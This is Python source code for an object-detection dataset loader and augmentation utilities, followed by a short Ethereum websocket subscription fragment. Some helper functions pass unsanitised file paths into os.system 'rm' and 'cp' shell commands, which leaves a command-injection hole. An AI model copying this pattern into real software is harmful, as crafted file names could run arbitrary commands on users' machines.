(p, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nf, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nf, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
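# A minimal inference-side sketch (the source directory is a placeholder):
#
#     dataset = LoadImages('inference/images', img_size=640)
#     for path, img, img0, vid_cap in dataset:
#         # img:  letterboxed, RGB, CHW array ready for torch.from_numpy(img)
#         # img0: the original BGR image as read by cv2 (HWC)
#         pass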
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=640):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:[email protected]/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:[email protected]/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:[email protected]:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(0 if s == '0' else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0):
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = str(Path(p)) # os-agnostic
parent = str(Path(p).parent) + os.sep
if os.path.isfile(p): # file
with open(p, 'r') as t:
t = t.read().splitlines()
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
elif os.path.isdir(p): # folder
f += glob.iglob(p + os.sep + '*.*')
else:
raise Exception('%s does not exist' % p)
self.img_files = sorted(
[x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats])
except Exception as e:
raise Exception('Error loading data from %s: %s\nSee %s' % (path, e, help_url))
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n # number of images
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
# Define labels
self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt') for x in
self.img_files]
# Check cache
cache_path = str(Path(self.label_files[0]).parent) + '.cache' # cached labels
if os.path.isfile(cache_path):
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files): # dataset changed
cache = self.cache_labels(cache_path) # re-cache
else:
cache = self.cache_labels(cache_path) # cache
# Get labels
labels, shapes = zip(*[cache[x] for x in self.img_files])
self.shapes = np.array(shapes, dtype=np.float64)
self.labels = list(labels)
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache labels
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
pbar = tqdm(self.label_files)
for i, file in enumerate(pbar):
l = self.labels[i] # label
if l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
pbar.desc = 'Scanning labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
cache_path, nf, nm, ne, nd, n)
if nf == 0:
s = 'WARNING: No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
print(s)
assert not augment, '%s. Can not train without labels.' % s
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
def cache_labels(self, path='labels.cache'):
# Cache dataset labels, check images and read shapes
x = {} # dict
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for (img, label) in pbar:
try:
l = []
image = Image.open(img)
image.verify() # PIL verify
# _ = io.imread(img) # skimage verify (from skimage import io)
shape = exif_size(image) # image size
assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
if os.path.isfile(label):
with open(label, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32) # labels
if len(l) == 0:
l = np.zeros((0, 5), dtype=np.float32)
x[img] = [l, shape]
except Exception as e:
x[img] = None
print('WARNING: %s: %s' % (img, e))
x['hash'] = get_hash(self.label_files + self.img_files)
torch.save(x, path) # save for next time
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
if self.mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, len(self.labels) - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not self.mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
yc, xc = s, s # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
# np.clip(labels4[:, 1:] - s / 2, 0, s, out=labels4[:, 1:]) # use with center crop
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_affine
# Replicate
# img4, labels4 = replicate(img4, labels4)
# Augment
# img4 = img4[s // 2: int(s * 1.5), s // 2:int(s * 1.5)] # center crop (WARNING, requires box pruning)
img4, labels4 = random_perspective(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
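# Quick illustration of the letterbox behaviour (shapes are worked examples):
#
#     im = np.zeros((720, 1280, 3), dtype=np.uint8)
#     out, ratio, (dw, dh) = letterbox(im, new_shape=640)
#     # r = min(640/720, 640/1280) = 0.5, so the image is resized to 640x360
#     # and, with auto=True, padded up to the next multiple of 64 in height:
#     # out.shape -> (384, 640, 3); ratio -> (0.5, 0.5); (dw, dh) -> (0.0, 12.0)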
def random_perspective(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
if perspective:
xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8) # rescale
else: # affine
xy = xy[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.2): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + 1e-16), h2 / (w2 + 1e-16)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + 1e-16) > area_thr) & (ar < ar_thr) # candidates
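# Hedged illustration of box_candidates(), not part of the original pipeline:
# box1/box2 are 4xN arrays of x1, y1, x2, y2 before and after augmentation;
# the values below are hypothetical and np is assumed importable.
def _box_candidates_sketch():
    before = np.array([[0., 50.], [0., 50.], [100., 60.], [100., 60.]])  # two boxes, shape (4, 2)
    after = np.array([[0., 50.], [0., 50.], [90., 51.], [90., 51.]])     # the same boxes after augmentation
    return box_candidates(box1=before, box2=after)  # -> [True, False]: the second box shrank below wh_thr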
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
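# Hedged usage sketch for cutout(), not part of the original pipeline: shapes
# and values below are illustrative. The image is masked in place and labels
# that become more than 60% obscured are dropped.
def _cutout_sketch():
    img = np.full((640, 640, 3), 114, dtype=np.uint8)  # dummy grey image
    lbls = np.array([[0., 100., 100., 300., 300.]])    # one label: [cls, x1, y1, x2, y2]
    return cutout(img, lbls)                           # remaining (unobscured) labels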
def reduce_img_size(path='path/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except Exception:
print('WARNING: image failure %s' % f)
def recursive_dataset2bmp(dataset='path/dataset_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='path/images.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
|
websockets.py
|
import threading
import random
import asyncio
import sys
import aiohttp
from wsutils.clientwebsocket import ClientWebSocket
from wsutils import wsutils
from rpcutils import constants as rpcConstants
from .constants import *
from .connector import WS_ENDPOINT
from . import utils
from logger import logger
@wsutils.webSocket
def ethereumWS():
logger.printInfo("Starting WS for Ethereum")
ethereumWSClient = threading.Thread(target=ethereumWSThread, args=("Eth daemon",), daemon=True)
ethereumWSClient.start()
def ethereumWSThread(args):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(ethereumClientCallback(args))
loop.close()
async def ethereumClientCallback(request):
async with ClientWebSocket(WS_ENDPOINT) as session:
logger.printInfo(f"Connecting to {WS_ENDPOINT}")
await session.connect()
payload = {
rpcConstants.ID: random.randint(1, sys.maxsize),
rpcConstants.METHOD: SUBSCRIBE_METHOD,
rpcConstants.PARAMS: [
NEW_HEADS_SUBSCRIPTION,
{
INCLUDE_TRANSACTIONS: True
}
